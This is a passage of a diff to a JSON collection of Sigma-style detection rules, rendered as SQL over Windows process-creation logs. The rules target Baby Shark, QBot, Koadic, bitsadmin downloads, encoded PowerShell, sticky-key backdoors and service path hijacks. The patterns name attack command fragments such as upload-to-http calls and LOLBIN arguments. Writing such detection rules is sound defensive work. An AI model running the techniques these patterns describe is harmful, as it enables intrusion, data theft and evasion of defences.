"2b30fa36-3a18-402f-a22d-bf4ce2189f35", - "status": "test", - "description": "Detects activity that could be related to Baby Shark malware", - "author": "Florian Roth (Nextron Systems)", - "tags": [ + "title": "Wscript Shell Run In CommandLine", + "id": "2c28c248-7f50-417a-9186-a85b223010ee", + "status": "experimental", + "description": "Detects the presence of the keywords \"Wscript\", \"Shell\" and \"Run\" in the command, which could indicate a suspicious activity", + "author": "Nasreddine Bencherchali (Nextron Systems)", + "tags": [ "attack.execution", - "attack.defense_evasion", - "attack.discovery", - "attack.t1012", - "attack.t1059.003", - "attack.t1059.001", - "attack.t1218.005" + "attack.t1059" ], "falsepositives": [ - "Unknown" + "Rare legitimate inline scripting by some administrators" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((CommandLine LIKE '%powershell.exe mshta.exe http%' ESCAPE '\\' AND CommandLine LIKE '%.hta%' ESCAPE '\\') OR (CommandLine LIKE '%reg query \"HKEY\\_CURRENT\\_USER\\\\Software\\\\Microsoft\\\\Terminal Server Client\\\\Default\"%' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe /c taskkill /im cmd.exe%' ESCAPE '\\' OR CommandLine LIKE '%(New-Object System.Net.WebClient).UploadFile(''http%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%Wscript.%' ESCAPE '\\' AND CommandLine LIKE '%.Shell%' ESCAPE '\\' AND CommandLine LIKE '%.Run%' ESCAPE '\\')" ], - "filename": "proc_creation_win_malware_babyshark.yml" + "filename": "proc_creation_win_script_wscript_shell_cli.yml" }, { - "title": "Audit Policy Tampering Via Auditpol", - "id": "0a13e132-651d-11eb-ae93-0242ac130002", - "status": "test", - "description": "Threat actors can use auditpol binary to change audit policy configuration to impair detection capability.\nThis can be carried out by selectively disabling/removing certain audit policies as well as restoring a custom policy owned by the threat actor.\n", - "author": "Janantha Marasinghe (https://github.com/blueteam0ps)", + "title": "Potential Process Injection Via Msra.EXE", + "id": "744a188b-0415-4792-896f-11ddb0588dbc", + "status": "experimental", + "description": "Detects potential process injection via Microsoft Remote Asssistance (Msra.exe) by looking at suspicious child processes spawned from the aforementioned process. It has been a target used by many threat actors and used for discovery and persistence tactics", + "author": "Alexander McDonald", "tags": [ "attack.defense_evasion", - "attack.t1562.002" + "attack.t1055" ], "falsepositives": [ - "Administrator or administrator scripts might leverage the flags mentioned in the detection section. Either way, it should always be monitored" + "Legitimate use of Msra.exe" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\auditpol.exe' ESCAPE '\\' OR OriginalFileName = 'AUDITPOL.EXE') AND (CommandLine LIKE '%disable%' ESCAPE '\\' OR CommandLine LIKE '%clear%' ESCAPE '\\' OR CommandLine LIKE '%remove%' ESCAPE '\\' OR CommandLine LIKE '%restore%' ESCAPE '\\'))" - ], - "filename": "proc_creation_win_auditpol_susp_execution.yml" - }, - { - "title": "Potential QBot Activity", - "id": "4fcac6eb-0287-4090-8eea-2602e4c20040", - "status": "stable", - "description": "Detects potential QBot activity by looking for process executions used previously by QBot", - "author": "Florian Roth (Nextron Systems)", - "tags": [ - "attack.execution", - "attack.t1059.005" - ], - "falsepositives": [ - "Unlikely" - ], - "level": "critical", - "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((ParentProcessName LIKE '%\\\\WinRAR.exe' ESCAPE '\\' AND NewProcessName LIKE '%\\\\wscript.exe' ESCAPE '\\') OR CommandLine LIKE '% /c ping.exe -n 6 127.0.0.1 & type %' ESCAPE '\\' OR (CommandLine LIKE '%regsvr32.exe%' ESCAPE '\\' AND CommandLine LIKE '%C:\\\\ProgramData%' ESCAPE '\\' AND CommandLine LIKE '%.tmp%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND ParentProcessName LIKE '%\\\\msra.exe' ESCAPE '\\' AND ParentCommandLine LIKE '%msra.exe' ESCAPE '\\' AND (NewProcessName LIKE '%\\\\arp.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\net.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\netstat.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\nslookup.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\route.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\schtasks.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\whoami.exe' ESCAPE '\\'))" ], - "filename": "proc_creation_win_malware_qbot.yml" + "filename": "proc_creation_win_msra_process_injection.yml" }, { - "title": "Add SafeBoot Keys Via Reg Utility", - "id": "d7662ff6-9e97-4596-a61d-9839e32dee8d", + "title": "Suspicious Download From File-Sharing Website Via Bitsadmin", + "id": "8518ed3d-f7c9-4601-a26c-f361a4256a0c", "status": "experimental", - "description": "Detects execution of \"reg.exe\" commands with the \"add\" or \"copy\" flags on safe boot registry keys. Often used by attacker to allow the ransomware to work in safe mode as some security products do not", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects usage of bitsadmin downloading a file from a suspicious domain", + "author": "Florian Roth (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.t1562.001" + "attack.persistence", + "attack.t1197", + "attack.s0190", + "attack.t1036.003" ], "falsepositives": [ - "Unlikely" + "Some legitimate apps use this, but limited." ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%reg.exe' ESCAPE '\\' OR OriginalFileName = 'reg.exe') AND CommandLine LIKE '%\\\\SYSTEM\\\\CurrentControlSet\\\\Control\\\\SafeBoot%' ESCAPE '\\' AND (CommandLine LIKE '% copy %' ESCAPE '\\' OR CommandLine LIKE '% add %' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\bitsadmin.exe' ESCAPE '\\' OR OriginalFileName = 'bitsadmin.exe') AND (CommandLine LIKE '% /transfer %' ESCAPE '\\' OR CommandLine LIKE '% /create %' ESCAPE '\\' OR CommandLine LIKE '% /addfile %' ESCAPE '\\') AND (CommandLine LIKE '%.ghostbin.co/%' ESCAPE '\\' OR CommandLine LIKE '%.hastebin.com%' ESCAPE '\\' OR CommandLine LIKE '%.paste.ee%' ESCAPE '\\' OR CommandLine LIKE '%anonfiles.com%' ESCAPE '\\' OR CommandLine LIKE '%cdn.discordapp.com/attachments/%' ESCAPE '\\' OR CommandLine LIKE '%ddns.net%' ESCAPE '\\' OR CommandLine LIKE '%gist.githubusercontent.com%' ESCAPE '\\' OR CommandLine LIKE '%mediafire.com%' ESCAPE '\\' OR CommandLine LIKE '%mega.nz%' ESCAPE '\\' OR CommandLine LIKE '%paste.ee%' ESCAPE '\\' OR CommandLine LIKE '%pastebin.com%' ESCAPE '\\' OR CommandLine LIKE '%pastebin.pl%' ESCAPE '\\' OR CommandLine LIKE '%pastetext.net%' ESCAPE '\\' OR CommandLine LIKE '%privatlab.com%' ESCAPE '\\' OR CommandLine LIKE '%privatlab.net%' ESCAPE '\\' OR CommandLine LIKE '%raw.githubusercontent.com%' ESCAPE '\\' OR CommandLine LIKE '%send.exploit.in%' ESCAPE '\\' OR CommandLine LIKE '%sendspace.com%' ESCAPE '\\' OR CommandLine LIKE '%storage.googleapis.com%' ESCAPE '\\' OR CommandLine LIKE '%transfer.sh%' ESCAPE '\\' OR CommandLine LIKE '%ufile.io%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_reg_add_safeboot.yml" + "filename": "proc_creation_win_bitsadmin_download_file_sharing_domains.yml" }, { - "title": "TropicTrooper Campaign November 2018", - "id": "8c7090c3-e0a0-4944-bd08-08c3a0cecf79", - "status": "stable", - "description": "Detects TropicTrooper activity, an actor who targeted high-profile organizations in the energy and food and beverage sectors in Asia", - "author": "@41thexplorer, Microsoft Defender ATP", + "title": "Suspicious Encoded PowerShell Command Line", + "id": "ca2092a1-c273-4878-9b4b-0d60115bf5ea", + "status": "test", + "description": "Detects suspicious powershell process starts with base64 encoded commands (e.g. Emotet)", + "author": "Florian Roth (Nextron Systems), Markus Neis, Jonhnathan Ribeiro, Daniil Yugoslavskiy, Anton Kutepov, oscd.community", "tags": [ "attack.execution", "attack.t1059.001" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%abCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCc%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (((NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\') OR OriginalFileName IN ('PowerShell.EXE', 'pwsh.dll')) AND ((CommandLine LIKE '% -e%' ESCAPE '\\' AND (CommandLine LIKE '% JAB%' ESCAPE '\\' OR CommandLine LIKE '% SUVYI%' ESCAPE '\\' OR CommandLine LIKE '% SQBFAFgA%' ESCAPE '\\' OR CommandLine LIKE '% aQBlAHgA%' ESCAPE '\\' OR CommandLine LIKE '% aWV4I%' ESCAPE '\\' OR CommandLine LIKE '% IAA%' ESCAPE '\\' OR CommandLine LIKE '% IAB%' ESCAPE '\\' OR CommandLine LIKE '% UwB%' ESCAPE '\\' OR CommandLine LIKE '% cwB%' ESCAPE '\\')) OR (CommandLine LIKE '%.exe -ENCOD %' ESCAPE '\\' OR CommandLine LIKE '% BA^J e-%' ESCAPE '\\'))) AND NOT ((CommandLine LIKE '% -ExecutionPolicy remotesigned %' ESCAPE '\\')))" ], - "filename": "proc_creation_win_apt_tropictrooper.yml" + "filename": "proc_creation_win_powershell_base64_encoded_cmd.yml" }, { - "title": "Suspicious Debugger Registration Cmdline", - "id": "ae215552-081e-44c7-805f-be16f975c8a2", - "status": "test", - "description": "Detects the registration of a debugger for a program that is available in the logon screen (sticky key backdoor).", - "author": "Florian Roth (Nextron Systems), oscd.community, Jonhnathan Ribeiro", + "title": "Exchange PowerShell Snap-Ins Usage", + "id": "25676e10-2121-446e-80a4-71ff8506af47", + "status": "experimental", + "description": "Detects adding and using Exchange PowerShell snap-ins to export mailbox data. As seen used by HAFNIUM and APT27", + "author": "FPT.EagleEye, Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.persistence", - "attack.privilege_escalation", - "attack.t1546.008" + "attack.execution", + "attack.t1059.001", + "attack.collection", + "attack.t1114" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%\\\\CurrentVersion\\\\Image File Execution Options\\\\%' ESCAPE '\\' AND (CommandLine LIKE '%sethc.exe%' ESCAPE '\\' OR CommandLine LIKE '%utilman.exe%' ESCAPE '\\' OR CommandLine LIKE '%osk.exe%' ESCAPE '\\' OR CommandLine LIKE '%magnify.exe%' ESCAPE '\\' OR CommandLine LIKE '%narrator.exe%' ESCAPE '\\' OR CommandLine LIKE '%displayswitch.exe%' ESCAPE '\\' OR CommandLine LIKE '%atbroker.exe%' ESCAPE '\\' OR CommandLine LIKE '%HelpPane.exe%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (((NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\') OR OriginalFileName IN ('PowerShell.EXE', 'pwsh.dll')) AND CommandLine LIKE '%Add-PSSnapin%' ESCAPE '\\' AND (CommandLine LIKE '%Microsoft.Exchange.Powershell.Snapin%' ESCAPE '\\' OR CommandLine LIKE '%Microsoft.Exchange.Management.PowerShell.SnapIn%' ESCAPE '\\')) AND NOT ((ParentProcessName LIKE 'C:\\\\Windows\\\\System32\\\\msiexec.exe' ESCAPE '\\' AND CommandLine LIKE '%$exserver=Get-ExchangeServer ([Environment]::MachineName) -ErrorVariable exerr 2> $null%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_registry_install_reg_debugger_backdoor.yml" + "filename": "proc_creation_win_powershell_snapins_hafnium.yml" }, { - "title": "Potential CVE-2021-40444 Exploitation Attempt", - "id": "894397c6-da03-425c-a589-3d09e7d1f750", + "title": "HackTool - Koadic Execution", + "id": "5cddf373-ef00-4112-ad72-960ac29bac34", "status": "test", - "description": "Detects potential exploitation of CVE-2021-40444 via suspicious process patterns seen in in-the-wild exploitations", - "author": "Florian Roth (Nextron Systems), @neonprimetime", + "description": "Detects command line parameters used by Koadic hack tool", + "author": "wagga, Jonhnathan Ribeiro, oscd.community", "tags": [ "attack.execution", - "attack.t1059" + "attack.t1059.003", + "attack.t1059.005", + "attack.t1059.007" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\control.exe' ESCAPE '\\' AND (ParentProcessName LIKE '%\\\\winword.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\powerpnt.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\excel.exe' ESCAPE '\\')) AND NOT ((CommandLine LIKE '%\\\\control.exe input.dll' ESCAPE '\\' OR CommandLine LIKE '%\\\\control.exe\" input.dll' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\' OR OriginalFileName = 'Cmd.Exe') AND (CommandLine LIKE '%/q%' ESCAPE '\\' AND CommandLine LIKE '%/c%' ESCAPE '\\' AND CommandLine LIKE '%chcp%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_exploit_cve_2021_40444.yml" + "filename": "proc_creation_win_hktl_koadic.yml" }, { - "title": "Suspicious Shells Spawned by Java", - "id": "0d34ed8b-1c12-4ff2-828c-16fc860b766d", - "status": "experimental", - "description": "Detects suspicious shell spawned from Java host process (e.g. log4j exploitation)", - "author": "Andreas Hunkeler (@Karneades), Florian Roth", + "title": "NtdllPipe Like Activity Execution", + "id": "bbc865e4-7fcd-45a6-8ff1-95ced28ec5b2", + "status": "test", + "description": "Detects command that type the content of ntdll.dll to a different file or a pipe in order to evade AV / EDR detection. As seen being used in the POC NtdllPipe", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.initial_access", - "attack.persistence", - "attack.privilege_escalation" + "attack.defense_evasion" ], "falsepositives": [ - "Legitimate calls to system binaries", - "Company specific internal usage" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND ParentProcessName LIKE '%\\\\java.exe' ESCAPE '\\' AND (NewProcessName LIKE '%\\\\sh.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\bash.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\schtasks.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\certutil.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\whoami.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\bitsadmin.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wscript.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\cscript.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\scrcons.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\hh.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wmic.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\mshta.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\forfiles.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\scriptrunner.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\mftrace.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\AppVLP.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\curl.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\systeminfo.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\net.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\net1.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\reg.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\query.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (CommandLine LIKE '%type \\%windir\\%\\\\system32\\\\ntdll.dll%' ESCAPE '\\' OR CommandLine LIKE '%type \\%systemroot\\%\\\\system32\\\\ntdll.dll%' ESCAPE '\\' OR CommandLine LIKE '%type c:\\\\windows\\\\system32\\\\ntdll.dll%' ESCAPE '\\' OR CommandLine LIKE '%\\\\ntdll.dll > \\\\\\\\.\\\\pipe\\\\\\*' ESCAPE '\\'))" ], - "filename": "proc_creation_win_java_susp_child_process.yml" + "filename": "proc_creation_win_cmd_ntdllpipe_redirect.yml" }, { - "title": "Suspicious Serv-U Process Pattern", - "id": "58f4ea09-0fc2-4520-ba18-b85c540b0eaf", - "status": "experimental", - "description": "Detects a suspicious process pattern which could be a sign of an exploited Serv-U service", - "author": "Florian Roth (Nextron Systems)", + "title": "Suspicious Service Path Modification", + "id": "138d3531-8793-4f50-a2cd-f291b2863d78", + "status": "test", + "description": "Detects service path modification via the \"sc\" binary to a suspicious command or path", + "author": "Victor Sergeev, oscd.community, Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.credential_access", - "attack.t1555", - "cve.2021.35211" + "attack.persistence", + "attack.privilege_escalation", + "attack.t1543.003" ], "falsepositives": [ - "Legitimate uses in which users or programs use the SSH service of Serv-U for remote command execution" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND ParentProcessName LIKE '%\\\\Serv-U.exe' ESCAPE '\\' AND (NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wscript.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\cscript.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\sh.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\bash.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\schtasks.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wmic.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\mshta.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\msiexec.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\forfiles.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\scriptrunner.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND NewProcessName LIKE '%\\\\sc.exe' ESCAPE '\\' AND CommandLine LIKE '%config%' ESCAPE '\\' AND CommandLine LIKE '%binPath%' ESCAPE '\\' AND (CommandLine LIKE '%powershell%' ESCAPE '\\' OR CommandLine LIKE '%cmd %' ESCAPE '\\' OR CommandLine LIKE '%mshta%' ESCAPE '\\' OR CommandLine LIKE '%wscript%' ESCAPE '\\' OR CommandLine LIKE '%cscript%' ESCAPE '\\' OR CommandLine LIKE '%rundll32%' ESCAPE '\\' OR CommandLine LIKE '%svchost%' ESCAPE '\\' OR CommandLine LIKE '%dllhost%' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe /c%' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe /k%' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe /r%' ESCAPE '\\' OR CommandLine LIKE '%cmd /c%' ESCAPE '\\' OR CommandLine LIKE '%cmd /k%' ESCAPE '\\' OR CommandLine LIKE '%cmd /r%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\Users\\\\Public%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Downloads\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Desktop\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Microsoft\\\\Windows\\\\Start Menu\\\\Programs\\\\Startup\\\\%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\Windows\\\\TEMP\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\AppData\\\\Local\\\\Temp%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_servu_susp_child_process.yml" + "filename": "proc_creation_win_sc_service_path_modification.yml" }, { - "title": "Exploit for CVE-2017-8759", - "id": "fdd84c68-a1f6-47c9-9477-920584f94905", + "title": "Potential Defense Evasion Via Rename Of Highly Relevant Binaries", + "id": "0ba1da6d-b6ce-4366-828c-18826c9de23e", "status": "test", - "description": "Detects Winword starting uncommon sub process csc.exe as used in exploits for CVE-2017-8759", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects the execution of a renamed binary often used by attackers or malware leveraging new Sysmon OriginalFileName datapoint.", + "author": "Matthew Green - @mgreen27, Florian Roth (Nextron Systems), frack113", "tags": [ - "attack.execution", - "attack.t1203", - "attack.t1204.002", - "attack.initial_access", - "attack.t1566.001" + "attack.defense_evasion", + "attack.t1036.003", + "car.2013-05-009" ], "falsepositives": [ - "Unknown" + "Custom applications use renamed binaries adding slight change to binary name. Typically this is easy to spot and add to whitelist", + "PsExec installed via Windows Store doesn't contain original filename field (False negative)" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND ParentProcessName LIKE '%\\\\WINWORD.EXE' ESCAPE '\\' AND NewProcessName LIKE '%\\\\csc.exe' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (Description = 'Execute processes remotely' OR Product = 'Sysinternals PsExec' OR (Description LIKE 'Windows PowerShell%' ESCAPE '\\' OR Description LIKE 'pwsh%' ESCAPE '\\') OR (OriginalFileName LIKE 'powershell.exe' ESCAPE '\\' OR OriginalFileName LIKE 'pwsh.dll' ESCAPE '\\' OR OriginalFileName LIKE 'powershell\\_ise.exe' ESCAPE '\\' OR OriginalFileName LIKE 'psexec.exe' ESCAPE '\\' OR OriginalFileName LIKE 'psexec.c' ESCAPE '\\' OR OriginalFileName LIKE 'psexesvc.exe' ESCAPE '\\' OR OriginalFileName LIKE 'cscript.exe' ESCAPE '\\' OR OriginalFileName LIKE 'wscript.exe' ESCAPE '\\' OR OriginalFileName LIKE 'mshta.exe' ESCAPE '\\' OR OriginalFileName LIKE 'regsvr32.exe' ESCAPE '\\' OR OriginalFileName LIKE 'wmic.exe' ESCAPE '\\' OR OriginalFileName LIKE 'certutil.exe' ESCAPE '\\' OR OriginalFileName LIKE 'rundll32.exe' ESCAPE '\\' OR OriginalFileName LIKE 'cmstp.exe' ESCAPE '\\' OR OriginalFileName LIKE 'msiexec.exe' ESCAPE '\\' OR OriginalFileName LIKE 'reg.exe' ESCAPE '\\')) AND NOT ((NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\powershell\\_ise.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\psexec.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\psexec64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\PSEXESVC.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\cscript.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wscript.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\mshta.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wmic.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\certutil.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\cmstp.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\msiexec.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\reg.exe' ESCAPE '\\')))" ], - "filename": "proc_creation_win_exploit_cve_2017_8759.yml" + "filename": "proc_creation_win_renamed_binary_highly_relevant.yml" }, { - "title": "Potential PowerShell Execution Via DLL", - "id": "6812a10b-60ea-420c-832f-dfcc33b646ba", - "status": "test", - "description": "Detects potential PowerShell execution from a DLL instead of the usual PowerShell process as seen used in PowerShdll", - "author": "Markus Neis, Nasreddine Bencherchali", + "title": "Use of W32tm as Timer", + "id": "6da2c9f5-7c53-401b-aacb-92c040ce1215", + "status": "experimental", + "description": "When configured with suitable command line arguments, w32tm can act as a delay mechanism", + "author": "frack113", "tags": [ - "attack.defense_evasion", - "attack.t1218.011" + "attack.discovery", + "attack.t1124" ], "falsepositives": [ - "Unknown" + "Legitimate use" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\regsvcs.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\InstallUtil.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\regasm.exe' ESCAPE '\\') OR OriginalFileName IN ('RUNDLL32.EXE', 'RegSvcs.exe', 'InstallUtil.exe', 'RegAsm.exe')) AND (CommandLine LIKE '%Default.GetString%' ESCAPE '\\' OR CommandLine LIKE '%FromBase64String%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Expression%' ESCAPE '\\' OR CommandLine LIKE '%IEX %' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Command%' ESCAPE '\\' OR CommandLine LIKE '%ICM %' ESCAPE '\\' OR CommandLine LIKE '%DownloadString%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\w32tm.exe' ESCAPE '\\' OR OriginalFileName = 'w32time.dll') AND (CommandLine LIKE '%/stripchart%' ESCAPE '\\' AND CommandLine LIKE '%/computer:%' ESCAPE '\\' AND CommandLine LIKE '%/period:%' ESCAPE '\\' AND CommandLine LIKE '%/dataonly%' ESCAPE '\\' AND CommandLine LIKE '%/samples:%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_powershell_dll_execution.yml" + "filename": "proc_creation_win_w32tm.yml" }, { - "title": "Potential Atlassian Confluence CVE-2021-26084 Exploitation Attempt", - "id": "245f92e3-c4da-45f1-9070-bc552e06db11", + "title": "Suspicious LOLBIN AccCheckConsole", + "id": "0f6da907-5854-4be6-859a-e9958747b0aa", "status": "test", - "description": "Detects spawning of suspicious child processes by Atlassian Confluence server which may indicate successful exploitation of CVE-2021-26084", - "author": "Bhabesh Raj", + "description": "Detects suspicious LOLBIN AccCheckConsole execution with parameters as used to load an arbitrary DLL", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.initial_access", - "attack.execution", - "attack.t1190", - "attack.t1059" + "attack.execution" ], "falsepositives": [ - "Unknown" + "Legitimate use of the UI Accessibility Checker" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND ParentProcessName LIKE '%\\\\Atlassian\\\\Confluence\\\\jre\\\\bin\\\\java.exe' ESCAPE '\\' AND (CommandLine LIKE '%certutil%' ESCAPE '\\' OR CommandLine LIKE '%cmd /c%' ESCAPE '\\' OR CommandLine LIKE '%cmd /k%' ESCAPE '\\' OR CommandLine LIKE '%cscript%' ESCAPE '\\' OR CommandLine LIKE '%curl%' ESCAPE '\\' OR CommandLine LIKE '%ipconfig%' ESCAPE '\\' OR CommandLine LIKE '%powershell%' ESCAPE '\\' OR CommandLine LIKE '%pwsh%' ESCAPE '\\' OR CommandLine LIKE '%regsvr32%' ESCAPE '\\' OR CommandLine LIKE '%rundll32%' ESCAPE '\\' OR CommandLine LIKE '%whoami%' ESCAPE '\\' OR CommandLine LIKE '%wscript%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\AccCheckConsole.exe' ESCAPE '\\' OR OriginalFileName = 'AccCheckConsole.exe') AND (CommandLine LIKE '% -window %' ESCAPE '\\' AND CommandLine LIKE '%.dll%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_exploit_cve_2021_26084_atlassian_confluence.yml" + "filename": "proc_creation_win_lolbin_susp_acccheckconsole.yml" }, { - "title": "Potential WinAPI Calls Via CommandLine", - "id": "ba3f5c1b-6272-4119-9dbd-0bc8d21c2702", + "title": "Winrar Compressing Dump Files", + "id": "1ac14d38-3dfc-4635-92c7-e3fd1c5f5bfc", "status": "experimental", - "description": "Detects the use of WinAPI Functions via the commandline. As seen used by threat actors via the tool winapiexec", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects a suspicious winrar execution that involves a file with a \".dmp\"/\".dump\" extension, which could be a step in a process of dump file exfiltration", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.execution", - "attack.t1106" + "attack.collection", + "attack.t1560.001" ], "falsepositives": [ - "Unknown" + "Legitimate use of WinRAR with a command line in which .dmp appears accidentally" ], "level": "high", "rule": [ - 